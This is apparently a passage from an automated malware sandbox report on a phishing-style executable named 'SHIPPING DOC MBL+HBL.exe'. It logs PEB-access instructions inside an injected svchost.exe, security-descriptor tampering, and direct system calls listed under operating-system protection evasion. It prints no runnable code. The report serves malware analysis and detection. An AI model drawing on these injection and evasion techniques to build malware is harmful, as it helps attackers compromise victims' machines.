            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F866E mov eax, dword ptr fs:[00000030h]1_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A660 mov eax, dword ptr fs:[00000030h]1_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03262674 mov eax, dword ptr fs:[00000030h]1_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324C640 mov eax, dword ptr fs:[00000030h]1_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C6A6 mov eax, dword ptr fs:[00000030h]1_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032666B0 mov eax, dword ptr fs:[00000030h]1_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03234690 mov eax, dword ptr fs:[00000030h]1_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AE6F2 mov eax, dword ptr fs:[00000030h]1_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B06F1 mov eax, dword ptr fs:[00000030h]1_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A6C7 mov eax, dword ptr fs:[00000030h]1_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240535 mov eax, dword ptr fs:[00000030h]1_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E53E mov eax, dword ptr fs:[00000030h]1_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6500 mov eax, dword ptr fs:[00000030h]1_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304500 mov eax, dword ptr fs:[00000030h]1_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326656A mov eax, dword ptr fs:[00000030h]1_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238550 mov eax, dword ptr fs:[00000030h]1_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B05A7 mov eax, dword ptr fs:[00000030h]1_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032545B1 mov eax, dword ptr fs:[00000030h]1_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov eax, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232582 mov ecx, dword ptr fs:[00000030h]1_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03264588 mov eax, dword ptr fs:[00000030h]1_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E59C mov eax, dword ptr fs:[00000030h]1_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325E5E7 mov eax, dword ptr fs:[00000030h]1_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032325E0 mov eax, dword ptr fs:[00000030h]1_2_032325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326C5ED mov eax, dword ptr fs:[00000030h]1_2_0326C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E5CF mov eax, dword ptr fs:[00000030h]1_2_0326E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032365D0 mov eax, dword ptr fs:[00000030h]1_2_032365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A5D0 mov eax, dword ptr fs:[00000030h]1_2_0326A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322E420 mov eax, dword ptr fs:[00000030h]1_2_0322E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C427 mov eax, dword ptr fs:[00000030h]1_2_0322C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B6420 mov eax, dword ptr fs:[00000030h]1_2_032B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03268402 mov eax, dword ptr fs:[00000030h]1_2_03268402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BC460 mov ecx, dword ptr fs:[00000030h]1_2_032BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325A470 mov eax, dword ptr fs:[00000030h]1_2_0325A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E443 mov eax, dword ptr fs:[00000030h]1_2_0326E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA456 mov eax, dword ptr fs:[00000030h]1_2_032EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322645D mov eax, dword ptr fs:[00000030h]1_2_0322645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325245A mov eax, dword ptr fs:[00000030h]1_2_0325245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032364AB mov eax, dword ptr fs:[00000030h]1_2_032364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032644B0 mov ecx, dword ptr fs:[00000030h]1_2_032644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BA4B0 mov eax, dword ptr fs:[00000030h]1_2_032BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EA49A mov eax, dword ptr fs:[00000030h]1_2_032EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032304E5 mov ecx, dword ptr fs:[00000030h]1_2_032304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EB20 mov eax, dword ptr fs:[00000030h]1_2_0325EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F8B28 mov eax, dword ptr fs:[00000030h]1_2_032F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03304B00 mov eax, dword ptr fs:[00000030h]1_2_03304B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032AEB1D mov eax, dword ptr fs:[00000030h]1_2_032AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322CB7E mov eax, dword ptr fs:[00000030h]1_2_0322CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4B4B mov eax, dword ptr fs:[00000030h]1_2_032E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03302B57 mov eax, dword ptr fs:[00000030h]1_2_03302B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C6B40 mov eax, dword ptr fs:[00000030h]1_2_032C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB40 mov eax, dword ptr fs:[00000030h]1_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D8B42 mov eax, dword ptr fs:[00000030h]1_2_032D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03228B50 mov eax, dword ptr fs:[00000030h]1_2_03228B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEB50 mov eax, dword ptr fs:[00000030h]1_2_032DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240BBE mov eax, dword ptr fs:[00000030h]1_2_03240BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E4BB0 mov eax, dword ptr fs:[00000030h]1_2_032E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03238BF0 mov eax, dword ptr fs:[00000030h]1_2_03238BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EBFC mov eax, dword ptr fs:[00000030h]1_2_0325EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCBF0 mov eax, dword ptr fs:[00000030h]1_2_032BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250BCB mov eax, dword ptr fs:[00000030h]1_2_03250BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230BCD mov eax, dword ptr fs:[00000030h]1_2_03230BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEBD0 mov eax, dword ptr fs:[00000030h]1_2_032DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA24 mov eax, dword ptr fs:[00000030h]1_2_0326CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325EA2E mov eax, dword ptr fs:[00000030h]1_2_0325EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03254A35 mov eax, dword ptr fs:[00000030h]1_2_03254A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BCA11 mov eax, dword ptr fs:[00000030h]1_2_032BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326CA6F mov eax, dword ptr fs:[00000030h]1_2_0326CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DEA60 mov eax, dword ptr fs:[00000030h]1_2_032DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]1_2_032ACA72
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03236A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03240A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03238AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03286AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03304A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03268A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03286ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03230AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03264AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03228918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03256962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0327096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0327096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03304940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0323A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03252835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03252835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0326A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_032C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E581D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E2A2A4 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtTerminateThread: Direct from: 0x76F02FCC
